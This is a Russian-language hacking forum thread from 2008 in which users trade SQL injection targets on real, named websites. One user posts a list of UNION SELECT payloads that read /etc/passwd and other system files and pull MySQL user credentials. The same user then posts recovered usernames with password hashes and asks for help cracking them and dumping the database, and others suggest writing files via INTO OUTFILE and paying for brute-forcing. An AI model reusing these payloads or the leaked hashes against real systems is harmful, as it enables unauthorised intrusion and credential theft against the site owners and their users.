25.06.2008, 21:08
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от Gorev
http://mini-abo.eu/index.php?m=price&sstring=-1'&go=%CF%EE%E8%F1%EA
скуля...какие предложения по раскрутке?
Никак видимо, проверка длины параметра sstring, максимальная длина = 12 символов : хотя и пропускает = (', /**/, спец символы);
|
|
|
25.06.2008, 19:46
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
Warning: array_count_values() [function.array-count-values]: Can only count STRING and INTEGER values! in /u0/webroot/virtual/newsite.ncbi.managed.tibus.net/ncbi/shop/show_cart.php on line 81
|
|
|
|
25.06.2008, 21:24
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от Ershik
К какому виду относится эта ошибка?
http://www.ncbi.ie/ncbi/shop/show_cart.php?new=74%27&save=747'
http://ru2.php.net/manual/en/function.array-count-values.php
|
|
|
|
25.06.2008, 21:48
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
z3r0cool ошибка появляется не только в этом параметре....
на пример введи в поле поиска кавычку
|
|
|
|
25.06.2008, 22:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Gorev
Поиск это и есть параметр sstring
Запрос у тебя вываливается на страницу посмотри внимательно ,и всё сам увидишь
Попробуй ввести 10 символов(любых) и ковычку ошибки не будет, а 9 символов и ковычка- ошибка То-есть обрезается запрос после 10 символов + 2 знака %
LIKE '%твои_10_символов%'
|
|
|
|
25.06.2008, 22:38
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
jokester spasibo... znachit ne sud'ba
|
|
|
|
26.06.2008, 13:15
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Люди!!! Что делать?
Вот получил 80 kb хлама по запросам:
?news_id=9999+union+select+1,2,3,4,5,6,7/*
?news_id=9999+union+select+1,2,3,DATABASE(),5,6,7/*
?news_id=9999+union+select+1,2,3,USER(),5,6,7/*
?news_id=9999+union+select+1,2,3,VERSION(),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7/*
?news_id=9999+union+select+1,2,3,concat_ws(0x2F,us er,password),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7+from+mysql.user/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/syslog.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/ftpusers'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/proftpd.conf'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/hosts'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/services'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/group'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/profile'),5,6,7/*
?news_id=9999+union+select+1,2,3,LOAD_FILE('/etc/bashrc'),5,6,7/*
Самое ценное это
horde/7ec6cb6253573035
pma_0m8q29w9ure8/042d59146e94d7b2
admin/54e0c6945fa5e34c
u15364/6cb1963d2018c3ea
А что теперь делать то? Hash расшифровать неполучается.
Нужен дамп базы данных! HELP ME
|
|
|
|
26.06.2008, 13:37
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Сообщение от mff
Люди!!! Что делать?
INTO OUTFILE вроде никто не отменял? 
Кидай если что линк в личку, посмотрим.
|
|
|
|
26.06.2008, 13:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Хеши Mysql попробуй попросить сбрутить из за платно.
|
|
|
|
26.06.2008, 13:30
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Уже раз 10 просил - пока ничего 
http://hashcracking.info - нет результата
PasswordRpo - кислота
HELP ME 
Последний раз редактировалось mff; 26.06.2008 в 13:33..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
